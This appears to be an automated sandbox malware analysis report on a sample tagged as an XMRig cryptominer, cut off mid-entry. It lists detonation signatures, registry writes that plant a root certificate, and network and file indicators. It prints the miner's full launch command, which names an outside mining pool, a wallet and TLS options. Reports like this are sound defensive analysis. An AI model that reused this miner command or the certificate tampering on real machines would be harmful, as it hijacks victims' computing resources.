Malware Analysis Report

2024-09-10 00:25

Sample ID 240613-g8xxkaxdnh
Target packer.zip
SHA256 2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Tags
xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293

Threat Level: Known bad

The file packer.zip was found to be: Known bad.

Malicious Activity Summary

xmrig miner

XMRig Miner payload

xmrig

Executes dropped EXE

Unsigned PE

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 06:29

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:34

Platform

win10v2004-20240226-en

Max time kernel

1801s

Max time network

1819s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3588 --field-trial-handle=2280,i,11703952675008463361,17436195144517971517,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
GB 23.44.234.16:80 tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 76.234.34.23.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 213.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.204.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/4900-16-0x000001279A930000-0x000001279A950000-memory.dmp

memory/4900-17-0x000001279A970000-0x000001279A990000-memory.dmp

memory/4900-18-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-21-0x000001279A9B0000-0x000001279A9D0000-memory.dmp

memory/4900-20-0x000001279A990000-0x000001279A9B0000-memory.dmp

memory/4900-19-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-22-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-23-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-25-0x000001279A9B0000-0x000001279A9D0000-memory.dmp

memory/4900-24-0x000001279A990000-0x000001279A9B0000-memory.dmp

memory/4900-26-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-27-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-28-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-29-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-30-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-31-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-32-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-33-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-34-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-35-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-36-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-37-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-38-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-39-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-40-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-41-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-42-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-43-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-44-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-45-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-46-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-47-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-48-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-49-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-50-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-51-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-52-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-53-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-54-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-55-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-56-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-57-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-58-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-59-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-60-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-61-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-62-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-63-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-64-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-65-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-66-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-67-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-68-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-69-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-70-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-71-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-72-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-73-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-74-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-75-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-76-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-77-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-78-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-79-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-80-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-81-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-82-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-83-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

memory/4900-84-0x00007FF6242E0000-0x00007FF624DE3000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-13 06:29

Reported

2024-06-13 08:34

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1795s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bc